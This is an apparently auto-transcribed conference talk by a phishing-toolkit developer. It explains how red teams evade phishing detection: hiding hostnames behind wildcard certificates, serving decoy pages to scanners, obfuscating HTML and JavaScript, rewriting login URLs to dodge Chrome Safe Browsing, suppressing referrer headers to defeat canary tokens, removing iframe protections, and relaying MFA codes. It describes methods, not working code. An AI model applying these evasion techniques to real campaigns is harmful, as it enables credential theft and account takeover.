Transcript for:
Phishing Evasion Techniques

[Music] Thank you. It's a pleasure again to be here uh next year. Now I'm it's the first slot in front of the pirate ship trip. So I'm also honored to be invited here. And uh today I wanted to tell you about uh the fisherman the the wise fisherman never trust the weather. So, I'll be talking about how you can bypass the modern anti-ishing protections. Last year, I've been talk I talked about how uh how to protect yourself and how to also prevent bots from going and analyzing your fishing pages. And now, I want to expand on the subject and talk about all of the methods that I found out in in general. So, quickly about who am I? My name is Kubagki. I'm an offensive security tools developer. Uh I'm an exame hacker. I used to hack MMO games back in the days and I learned all the skills back then and I use them. Uh these days I do not do reverse engineering anymore but I now focus mostly on uh uh on fishing because it's easier like obviously. So I I run the breakdev security blog. You can check my research there and I also post all the updates uh about my tools uh over there. I've started Evil Jinx in 2017 and uh it has become my full-time job. Right now it's all thanks to you like wonderful people who actually support me uh with all the other projects like uh break the bread the community for red teamers I started about two years ago. So everyone is free to join and the evil jinx mastery that I released uh two years ago which is like a video course on how to use the tool that I made too hard to use for everyone and I had to create a video course to teach everyone how to use. So, thank you to everyone who actually supported this as well. And uh Evil Jinx Pro, I have been talking about it for couple of years, I think, right now. And every time I said it's going to be released in the next quarter of the of the year, but now finally I can stop doing that and it's uh finally uh released. So, what am I doing uh exactly? like uh right now I'm focusing full-time on Evil Jinx Pro and making it uh streamline the whole process of uh getting your red team engagements uh in terms of fishing working like fluently out of the box. So you do not have to work uh put extra work uh to make everything run for you. Uh so like I said offload excess tasks from red teams that's my main goal. Uh also nobody know not many know that Gdina with the city that we are here I'm also from this city it originated as a a fishing village like several hundred years ago. So now I'm preserving the original fishing tradition in a way by running my own fishing business. So uh I start I run the break the threat discord community which is also tied to this whole panel that I did for uh for sales of evil jinx pro. And uh I thought that I'm going to set up like this whole licensing uh system that I wanted. But for that I needed a custom solution for the shop engine. So I thought okay let's make it uh by my all by myself from scratch. So this is essentially how it looks like with the registration form. You can uh everyone single one of you can apply and uh every submission is uh manually verified. So this is the admin panel that I had to write for myself to actually do the verifications of each uh submission which takes a lot of time. And later I also made it like in a panel where you can actually assign all of the licenses to Evo Jinx Pro with like the whole card system like uh adding items, generating invoices and this like took six months too long probably because uh I wanted to focus on on the making a hacking tool and then I got into this rabbit hole by having to create like this uh full shop engine. So, I approved right now about 1,700 hackers into the community. Every single submission was uh uh was verified by hand. And then I figured, okay, I made like a uh shop engine from scratch and then I invited 1,700 hackers into it. And what could like what have I done essentially? So, but so far it's good like nobody actually managed to crush it yet. So, challenge accepted to maybe some of you. Uh so, first of all, I wanted to talk like about what the talk is about. So I wanted to talk about the state of reverse proxy fishing detections essentially. So I'll be focusing on reverse proxy fishing. I will not be focusing on uh the detection of emails that you send with the fishing links because it's a entirely different subject. I want to focus on uh the detection of the fishing pages themselves. So for example, I'll be talking about in general uh specifically about how to for example bypass Google Chrome save browsing later uh in the talk. So I divided the the anti-ishing uh evasion tactics into three separ separate layers. I call them three free layers of deception. So first of all we can do stealth. So this is when your TLS certificate for your fishing page gets registered and maybe some of you don't know but I also mentioned it many times. uh these certificates will get uploaded to uh TLS transparency report where everyone can actually browse it and all the bots and automation tools are can actually uh grab it and analyze your host names that you use for your fishing uh websites. So here the goal is to prevent public exposure of your fishing host name. Then the next step is deception. This is when the your fishing URL gets exposed. it will get exposed because you will send it to your target and you will uh you will have to send it to your target because they need to click it right so they had to get get fished. So the next step is to prevent actually the automated scanners from being able to analyze what's on the page and considering it uh marking it as malicious. Uh then the last step if all else fails it is the last resort is the obuscation. So when your fishing page gets exposed, uh we should prevent automated scanners from actually being able to detect this is a fishing attempt. So let we should make it look as legit as possible. So when someone clicks the link, they see okay, it's a Wikipedia page like nothing is happening happening here just the domain doesn't match. Uh so here you can see it's uh in a form of uh like onion layers or like whatever these are just these three layers. So the outer layer you can see it's uh host name and URL is not known and then we can apply wild card certificates so to protect our host names of our fishing pages and then uh the inner layer has the URL that is known and here we have bodgard or cloudflare turn style for example that will analyze the telemetry of the browser and the next page is when the page is accessible and we need to perform obuscation. So we'll start with the first one, first layer which is stealth. So this will be like simple stuff. Some of you already know about it. So this is the about protecting the fishing host name. So every fishing host name needs a TLS certificate obviously because HTTP is not supported anymore like it's clear text and nobody needs it anymore. And it also looks much more legit if you have like this green lock icon on in the web browser which is all that is about. Uh so every registered certificate uh TLS certificate is made public. So you can go to CRT.sh and you can actually check any domain that you want and you will get all the history of all uh the TLS certificates applied to this domain including all of the subdomains as well. So then when uh when the host name is known to the to the bot or the security product, they can resolve it to the NP IP address and of course the HTTPS server can then be analyzed uh externally. So what happens when you actually do non- wildcard TLS certificates uh for your fishing engagements? So here is the the screenshot that I made. It's for my domain eviljings.com that I use for uh for all the product related uh websites. And you can see there's like a full history of when uh the certificate was registered, when it expires, and uh when what is the the full host name including all of the subdomains. This is actually good also for if you're doing pen testing for example. uh it's great to use it to find out all the hidden uh subdomains of the uh of the website that you are uh uh essentially checking. So now we can see like in 2018 something fishy has been happening like on this domain and you can see there's likejinx.com there's Facebook. So this is actually from the time when I used this domain to do tests for evil jinx and it still like contaminated the whole uh history. So you need to remember that one does not simply remove TLS certificate from the internet. So once you do some bad stuff and fishy stuff it will remain there forever. So I need to live with it as well. So then we have wild card TLS certificate and what's what's the difference? So essentially if you use a wildcard TLS certificates the first level of the host name will get uh you can say obuscated because it it will hide the the top level subdomain. So if someone wanted to actually uh use your find out the host name of your fishing page they would need to actually implement some kind of dictionary attack to just brute force the subdomain because it is not clearly uh known. So this of course happens until your URL gets known and it's burned because you need to send it to someone. So they will they are not able also to connect to your HTTPS server by IP uh without knowing the host name. The next level is deception the next layer. So the fishing URL eventually will get exposed because you also want it to get exposed to the to the target and uh the security products will open the fishing URL and try scanning the page to see what is in there and what is actually uh the its contents. So how can we prevent the bots from seeing what's in the fishing page? So some of you are already probably familiar with cloudflare turnstyle which actually blocks uh traffic the bot traffic essentially what it tries to do and some people also use it to uh analyze the traffic coming to your fishing pages and block it. So in evil jinx pro I actually implemented my cheap knockoff of cloudflare turnstyle and this is essentially how it works like step by step. So you would get uh evil jinx forwarding the the connection to your to the spoofed website. So you can set up for example wiki wikipedia.org as your spoofed website. When the link when your fishing link is opened, it will grab the contents out of it. It will return the contents to the users browsers including the bodguard uh script which essentially will run within the page. The page is hidden with CSS style set on body to uh to hidden. And the script will then gather the browser telemetry and send it back to Evil Jinx Pro uh server for analysis. And then that's when Evil Jinx Pro actually makes the decision if it is a bot or not. Like I talked about it like last year at Zecon as well. So if you want to look it up how it works exactly, you can you can check it out. And if the bot is detected, it will set the CSS uh style to not hidden. So it will show actually the website and uh the user will see wikipedia.org like everything is fine but maybe it's better to use not wikipedia.org for your fishing pages because it's it's a bad example. So uh you have and when it when it's detected that bot is not detected then it will load redirect and load the fishing page uh to the target website which is for example accounts.google.com and return it back as a proxied login page. And this is like the the the gist of it how how botguard works uh similar to how Cloudflare turn style would. So the tech takeaways here are uh the majority of bots finally do not have JavaScript enabled even. So uh most of the detections will happen when analyzing like the contents of the website. So if Wikipedia.org content is returned like nothing will be uh suspicious about it. uh bots use see the proxy content of a legitimate website and human visitors get redirected to the fishing page. That's when the Bodgard rules of course work as expected. Uh so I actually made Bodgard as a cheap knockoff of Cloudflare turnstyle but apparently like someone told me that they tested both Cloudflare turn style and the Bodgard uh from Evil Jinx Pro and Microsoft Defender for Endpoint actually did not detect the latter. So like points for me I guess to for making a knockoff. So then we go to the interesting part which is the obuscation. So it is like the last layer of resort for actually uh protecting yourself uh from analysis on your on your fishing uh page. So you have uh the detection tools that that will scan your uh it will scan your fishing page and these are usually uh Google Chrome safe browsing is one of the major ones and this one is actually the most uh serious one when it comes to detecting and and flagging your website as malicious. Then you have browser extensions. So here we have for example push security and we have also canary tokens which work as a trip wire of uh informing the website owner when their website was used as a in a fishing uh in a fishing attack. Then the scanning targets of these security products are usually just scanning HTML content, JavaScript content, request URLs which will which are very important that we'll get to it uh in a in a bit. And then of course the DOM structure once the website is loaded it will analyze uh on the client side what is the structure of the of the website uh itself. So first we have HTML obuscation and uh imagine like this is the part of the this is the part of the login screen of uh Microsoft uh Microsoftonline.com. So what your fishing solution should do is essentially like some people use caddy for that or uh other setup to that actually intercepts the connection to the fishing page and they will do the full HTML opuscation. So here you can see uh it's just a simple script tag with a document.right write which will uh the obvious will decode the base 64 string with several string replacements and then push it out as a web content. Uh so this will effectively uh block any kind of signature pattern detection of uh the bots that try to look for patterns for example like like previously uh to look for patterns that say it's Google Microsoft or or whatever other uh login page that they they may be targeting. So next we have also JavaScript obuscation and for JavaScript op obuscation you can use like uh engines like for example obuscator.io. So it will turn this kind of code into this kind of code and it will dynamically uh so with evil jinks pro it's actually every reload I think every 5 minutes it will create a new randomly generated uh obuscator obuscated output. So this also helps when you want to use for example uh browser in the browser JavaScript which is heavily fingerprinted by uh Google safe browsing and you want to use it within your fishing pages and uh make it work. And then we get to client side fishing tool detection. So here we have uh signature detection of injected web content cookie name. the cookie names can also be detected and uh the detection moving is slowly to client side. So uh this is actually interesting because it's it it it looks like uh it is now the web browsers are becoming antiviruses on their own these days because uh like scanning websites and fishing links from external uh external point of entry is not that viable anymore. And actually the uh the detection systems are being installed within the web browsers which actually open these websites and can analyze the website while it is being rendered uh on the screen for the user who is getting fished. So one of the guys who actually is doing really great work is Luke Jennings. Uh he's a blue team guy who's working as a head research at push security. So shout out to him. He's working on this push security browser extension which actually does target evil jinx the the uh by checking one of the sign several signatures or IOC's you could say as well essentially artifacts that that uh mention that this is evil jinx running within uh the browser. So here is a post made by Rad Kabar. Uh Rad is here at this uh conference. So also shout out to him. I also tried to convince him to make a talk about it because he did some great research on uh on on push security extension and he managed to find how exactly push security is uh looking for evil jinx uh dynamically while the page is being loaded. So evil jinx the open source version uses like this pattern for uh for cookie names. So it's like four characters dash and four characters and then the value is always 64 hex characters. So this is like a pretty good indicator that something fishy is going on. Then there is our script paths of the injected JavaScript that are injected within the reverse proxy website and they usually start with slash sash and then again 64 hex characters and this is like enough indicator uh for the for the extension to mark uh these websites as malicious if they are being uh detected. So for the open source version, I am not changing like this signatures. This like the the public version of Evil Jinx is also like meant to be like a more of a proof of concept. You can change the source code yourself. Just it it's it's pretty easy to to to customize it on your own. But uh it is also good like that the bad guys who are also using evil jinx like we found out like uh two weeks ago I think uh they're also using it extensively. But yeah, maybe maybe not two weeks ago, but since uh 2017. Now I want to get to the fun stuff. So uh the next level of actually uh bypassing Chrome safe browsing is using URL uh obuscation kind of. So let's imagine that you have uh this is this looks similar to the login uh URL of Google uh that you would use. I just simplified it a bit. I left out I left like two get parameters that are intact and uh removed the others just to make it easier for everyone to see on on the screen. So here you see uh what Google will do. He will see okay there's like a accounts subdomain then there's this uh URL path which is also recognized by by Google Chrome and then it checks uh get parameters uh the their name and the value and if they actually match the ones that they have. This is by by the way this is by I found out about it through trial and error. So uh don't take my word for it. I did not reverse engineer Google Chrome to confirm it that it's really what it's doing but through uh testing uh that's what I managed to figure out uh so far and when it is actually uh matching all the URL subdomain and the get parameters it will say it will then check the domain then it checks okay it's google.com a okay everything is fine but what if it's actually a reverse proxy fishing page which actually will preserve all the characteristics of the same URL URL. So the accounts, the URL uh the subdomain, the URL path and the URL query will be the same. And when Google Chrome sees all the parts that it recognizes and then it wants to match the domain to google.com, that's when bad things happen and you will see something like this, which you probably saw many times before. How many of you actually got their like fishing campaign burned because of this nice nice screen? Okay, so it's good good to see. So the solution here is URL rewriting. So I've been also approached like many times by some people asking me if Evil Jinx would be able to do these URL rewrites, but I was unable to actually get it working pretty well. But now I think I finally found out how to how to do it properly. So this is like a new section you can implement uh within the fishlet. This is currently right now only working in in the in the pro version. So what it will look like it will it will look for the domain of the of the login page. So here in this example I'll be using the Microsoft.online uh example. Then it will check if it triggers the specific path and then what path to replace it to. So here like is by example it is it will replace it to slash o and then you need to supply at least one key that it will inject into this URL which also has the uh ID placeholder uh which is like in this uh brackets uh because uh I also need to maintain somehow in evil James like the index of all the mapped urls that I used uh to to be able to know what to redirect to after uh when when the user is actually hitting these uh replaced URLs. So here in this example we let's say this is like a fishing link to uh to Microsoft online uh page and so you have like a subdomain set to login you have the path that is that is the same and you have all the get parameters uh as well uh what this is also a simplified look of it and then you get like the the loginfishing.com maps to actually loginicrosoft uh online so that Evil Jinx will know when when it comes across uh this uh URL, it will know to to where to redirect this uh this request to and this will get rewritten to login fishing com/out and with our TD uh key and the randomly uh picked uh ID that will identify this specific uh rewritten URL. So for example when when the user actually opens this in uh in Google uh Chrome by the way Google safe browsing also uh does pattern signature uh detection of the Microsoft uh website uh some people reported it it I don't know it doesn't work most of the time but uh that's what I also found out so what what the Google browser will see it's it did not it matched okay it matched the subdomain But it did not match the URL path or the URL query. So everything is fine like it did it was not able to actually match these parameters this characteristics to the Microsoft uh login page uh in its database. So how does it work in transit when when the data is proxied uh through evil jinx? So the browser will make the request to the real URL path of the uh of the fishing page that is uh proxying Microsoft login screen. So you can see this is the the legitimate uh URL path on the host name of the fishing domain and evil jinx will then respond with a location found uh with the redirect because it it already mapped this URL and it tries to replace it in the browser itself on the client side. so that the client does not trigger uh the detection because the detection happens what I found out not when uh when the browser is actually making the request towards the fishing page. It happens when the response comes in from from the website probably because also uh HTTP headers from the response are analyzed as well. Then when the browser later after the redirection tries to request this specific URL that is actually the rewritten URL by by uh by the reverse proxy then evil jinx will know that okay the this URL with this ID which is randomly generated is mapped to this login screen with all these parameter parameters also uh intact. So it is also important to note that uh sometimes you cannot replace the full URL path. For example, uh it is not possible to do it on Google. Uh you have to so there is an option to actually whitelist several uh parameters of the get request uh to not be replaced and they will remain intact and uh this t with the randomized ID will be added to this parameter. It's because uh Google heavily uh uses its own JavaScript with their own opuscation engine and they will grab dynamically uh parameters straight from the URL address bar. So some parts have to remain intact to as well as the the account sub subdomain for example has to also remain intact. So then uh when the same happens in the other way when actually the fished website the destination is trying to redirect uh the user to the to the uh to the URL we are trying to rewrite. So this the location uh redirection will get uh will get essentially captured intercepted and it will also get replaced on the fly with the uh with our rewritten uh URL itself. So next thing I wanted to also talk about is the are the Canary tokens. So Canary tokens were developed by things to Canary. You can set them up, create them for free. And essentially, they allow you to, for example, inject your URL link, which acts as a trip wire into your uh into the supposed fishing page that would that would happen. So for example, Microsoft Entra ID uh tenants can allow you to supply your own custom CSS uh stylesheet and you can supply your own background for the login screen of your enter ID tenant uh and then you can use the URL that canary tokens actually provide you with. So whenever the website is whenever a visitor will open uh the the link uh even the legitimate one uh the request will happen uh to this background image which will actually include uh the referer uh with the URL of the real website. So I'm going to go dive more about it on the on the next slide. So there are also canary tokens on JavaScript. So if this happens on the on the on the website that you are trying to fish, you will have to replace it dynamically with some kind of signature detection as well. So here is an example for website breakd.org. So if the website does not match uh if the domain does not match, it will make a request to to an outside uh resource. But here I wanted to focus mostly on the CSS uh canary token because it's harder to uh to avoid really. Well, it used to be. So, here I wanted to give a shout out to thanks Canary for releasing this research and actually uh giving everyone the the the the way to to use Canary tokens. They released a pretty nice uh blog post about it. And also shout out to Kanis who after several months released a very uh verbose post about how he managed to uh work with bypassing these kind of protections and I'm going to deep uh dive deeper a bit uh how this works. So it's all reliant on the referer policy that is set for the domain uh within the the web browser of the website that you're currently browsing. So the default value is this one strict origin when cross origin. Uh and this actually will send the referer header of the HTTP request whenever uh there is a link to an external resource uh present somewhere on the website. So for example, if you put uh a resource a link to an URL that is not on the same domain in your CSS file that will point to the background image. Let's say like uh here in this example it was at cloudfront.net. cloudfront.net does not match the domain of the website you're currently browsing. And uh that way the request will include this referer header which will actually look like this. So here you can see that uh if if it was actually implemented on the uh on the fishing page uh the request would include the fishing page URL exposing our uh fishing infrastructure. So how to actually avoid that to prevent the browser from uh sending this referral header and we can just make since we are a reverse proxy and we can modify all of the packets going back and forth uh to between the destination server and the user we can inject our own HTTP headers in responses. And if you actually inject referral policy set to no referer in the response then it will uh not send and you will not include any refer information in any request even if they are uh being sent to external uh resource. So this is actually done automatically uh for evil jinx the open source version like since uh since I read this article because I thought let's find out how to bypass that then and and finally so this is how the how the response would look like. So finally uh Chrome would still send the referer header even when you set the refer policy to no refer. And uh that's exactly what Canon is uh like uh like had an issue with in his blog post because he was thinking like what what's wrong like it's it's not acting as it's not behaving as expected as as documented. So he mentioned that turns out they unintentionally identified a bug in Chromium browsers. uh and that thing uh actually triggered uh the the the whole set of events that they actually reported it to the chromium team but it got uh categorized as a low severity issue and he mentions that uh there is no way of if they are going to even uh fix it or or when and we can either pray that our target is not using a chromium browser or we are going to need a better solution. But fast forward to 2025, it was fixed. So, so I I checked it like before when making the slide. So, this uh refer for regarding Canary tokens is no longer in use and it is actually uh not a problem anymore. You just need to set this no refer in the response header which is happening automatically with uh with evil jinx. Then as a bonus I wanted to mention also browser in the browser which is uh a thing that got a bit popular several years ago. It is not essentially like a way to evade anti-ishing detections but I thought it's important also to mention it. So the origins are uh it was released by Mr. Docs in 2022 and it is uh how it works. It is essentially uh UI written in JavaScript which mimics Windows or Mac window within the website that you are watching. And in this uh fake UI window there will be an iframe with your fishing page. So here you can see well here you cannot pro probably see because it's too small but in the in the window you actually are able to since you control the rendering of this window which is fake you can put your own URL in there uh which will say like login.microsoftonline.com it will not contain your fishing host name at all or Google one. So then it all revolves around iframes and clickjing why why there is an issue with browser in the browser these days. So uh back then uh like in the 20200 uh 2000s years 2000s uh they have been there was a pretty popular attack called clickjing and what essentially clickjacking is is uh you were rendering a a part of the website that you wanted to target. let's say like a Facebook uh facebook.com with a like button and you would put uh another website on top of it uh and made it so that uh and then you make made some enticing image on this top layer so that the person who was actually clicking this uh uh this layer that was on top would click the like button beneath and that was how clickjing worked. So we could actually force user trick users into uh clicking the buttons on the websites they they are out they are logged into uh through uh this kind of uh like a sneak attack. So people uh websites started implementing uh ways to not have to run without with within iframes because it was not necessary it was also not needed iframes became uh an issue. So there are now multiple ways to prevent websites from loading within the iframes. So for example, you can set HTTP headers within uh for for the in the responses uh of of the of from your own web server to deny the Xframe options. You can uh set the content security policies. uh so in your way your like your goal is to remove these uh these HTTP responses if you want to do browser in the browser uh injection. So for JavaScript it's a bit more tricky complicated because the JavaScript detection of iframes is uh pretty straightforward pretty easy to implement but it is also uh sometimes hard to detect when you're actually targeting a website and you want to implement your uh browser in the browser there. So here you can see that the website will actually check if the top window is different from itself and if so replace the URL of the top window with its own. So the iframe will detect that it's not the top window and it will put its own URL into the top window which will redirect to the uh to the redirect the top window to the iframe essentially. So this prevents uh any form of uh iframes. So later a very clever man while mass from Cyprus he made like a very great talk uh about frameless uh browser in the browser. I forgot to put a date but I think it was like two years ago. Uh and what he did is actually he did not use the iframes. What he did was actually use the rendered website of the fishing page of the proxied page for example uh Microsoft signin screen and and uh modify its contents to include uh the the fake dialogue within uh its own uh within within its own HTML code which is pretty complicated because he made like a he made a demo for Microsoft uh website and you had to like specifically make it super custom uh to to make it work. So making like a universal solution is very complicated because you need to prepare your own modifications for every single website you are trying to actually uh target. So it works the same way. It looks the same way uh and works great but it will be difficult to implement it for websites that are not uh single page uh sign on uh screens like for example Microsoft.online. So if you have like websites that need to reload after a while then you will lose the modifications of the of the HTML content that it's doing and you will have and this will not work that much. But all is not lost. there are ways to still overcome like iframe blocking and make browser in the browser work again. So first we need to just find the JavaScript antiframe code like the one with the uh checking if it's a top window or a self window and then just replace it in real time. It has to be done customu customized for each website but also if the website has any kind of uh protections against reverse proxy fishing which are checking the domain name for example in the URL address bar that also needs to be removed. So this is just some additional work uh that has to be done. And apparently a fellow uh fellow hacker Otter hacker on Twitter recently I think uh more than a week ago published his own fishlet for evil jinx which actually removes the protections of octa uh signin page removing all these iframe protections and making iframe uh browser in the browser work again. So really shout out to him like uh really terrific work and it also proves that it can be done on any website just it needs a bit more work and just uh doing a bit of uh more analysis. So here is this summary. So too long didn't listen uh how to protect your fishing campaign. So first of all use wildcard TLS certificates to not expose your fishing host name. Then filter web traffic with JavaScript bot detection tools like cloud thrler turnst style or or write your own telemetry analysis uh gathering and analysis tools. then obuscate the HTML and JavaScript to protect it from signature detection and then rewrite URL paths which shows that it is very important to do especially on these login pages which are very heavily signatured especially in Google Chrome browser or reverse proxy only the multiffactor authentication flow and this is something I want to talk more about this year I just need to do some proper re research but this is essentially what the cyber criminals are doing right now for example when fishing for uh Steam uh accounts. So, they will do it the old ways, just render a static HTML web page with login and password and when the user enters it, there's no reverse proxying at all of the web content. So, there are no detections on the client side implemented within the JavaScript that's getting also reverse proxied from the destination website. So once the login and user uh login and password gets intercepted entered to the uh to the to this fake login page in the background on the server the fishing server it will make a request uh through the fake well it's not fake it's like through a background browser running over there logging in with the same credentials grabbing the MFA challenge and showing it back to the user uh in real time on this static HTML page and when the user enters this MFA challenge uh then they will also enter it in the in their background browser running on the server. So this actually is uh game over for most of the uh anti-ishing protections and uh the only the last resort is actually use pass keys and 502 solutions that way. So uh evil jinx is out. All of that that I talked about is uh currently implemented in the pro version. So like this is like a very short uh ad for that. Thank you everyone for coming to the last talk of this today. Thank you. Any questions?